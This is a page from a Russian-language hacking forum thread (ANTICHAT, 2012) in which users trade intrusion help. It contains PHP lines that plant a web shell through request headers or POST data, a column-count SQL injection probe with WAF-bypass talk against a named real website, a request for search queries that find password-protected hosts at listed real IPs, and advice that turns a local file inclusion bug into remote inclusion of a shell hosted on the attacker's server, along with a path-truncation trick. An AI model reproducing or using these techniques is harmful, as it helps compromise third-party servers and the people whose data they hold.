HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21331  
Старый 20.09.2012, 14:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от blesse  
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
 
Ответить с цитированием

  #21332  
Старый 20.09.2012, 15:16
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

Цитата:
Сообщение от blesse  
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
В случаях ,если IPTABLES strict's or allow_url_fopen=Off ->

file_put_contents('/path/shell.php',$_SERVE['HTTP_USER_AGENT']);

or

file_put_contents('/path/shell.php',$_POST['data']);
 
Ответить с цитированием

  #21333  
Старый 22.09.2012, 13:08
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами: 7864886

Репутация: -5
По умолчанию

Почему то не могу раскрутить

http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'

даже Havij не справился

посмотрите
 
Ответить с цитированием

  #21334  
Старый 22.09.2012, 13:20
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами: 7787126

Репутация: 53
По умолчанию

Цитата:
Сообщение от Hapk  
Почему то не могу раскрутить
http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'
даже Havij не справился
посмотрите
там защита он инъекций, фильтруется union selectt, дальше не смотрел
 
Ответить с цитированием

  #21335  
Старый 22.09.2012, 13:24
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами: 7864886

Репутация: -5
По умолчанию

и что больше нечего нельзя сделать?
 
Ответить с цитированием

  #21336  
Старый 22.09.2012, 14:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Hapk  
и что больше нечего нельзя сделать?
http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780+a nd+1=1+group+by+40+--+

TRUE

Ну полей 40 - с этим бы будем считать, что определились...

Теперь надо обойти WAF

UPDATE Фильтруются скобки. Думаю - можешь забить на этот сайт...
 
Ответить с цитированием

  #21337  
Старый 22.09.2012, 20:16
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?

Пример.

http://195.112.109.83/

http://79.170.27.106/

Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.
 
Ответить с цитированием

  #21338  
Старый 23.09.2012, 03:36
pvitalik80
Новичок
Регистрация: 22.09.2012
Сообщений: 3
С нами: 7178006

Репутация: 0
По умолчанию

LFI уязвимость

include $_GET['include_path'] . '/include/some/file.php';

Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
 
Ответить с цитированием

  #21339  
Старый 23.09.2012, 03:55
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от pvitalik80  
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
Ну если я правильно то понял, то возможно RFI c условиями, что

1) allow_url_include = On

2) На своём сервере создать путь /include/some/file.php и в качестве file.php разместить шелл-код.

Вариант событий второй...

Юзать дальше LFI и добраться до любых логов при использовании альтернативы нулл-байта, например 4096 слэшей, почитать об этом можно тут
 
Ответить с цитированием

  #21340  
Старый 23.09.2012, 06:33
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?
Пример.
http://195.112.109.83/
http://79.170.27.106/
Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.
Google не индексирует такие страницы.

Цитата:
Сообщение от pvitalik80  
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?
Всё достаточно просто.

Если есть возможность проинклудить файл с другого сервера:

http://site.com/shell.php?/include/some/file.php

Если такой возможности нет, то стоит обратить в первую очередь внимание на работу других функций с $_GET['include_path'], а они есть т.к. Null-байт вырезаеться и на _/thread98525.html
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.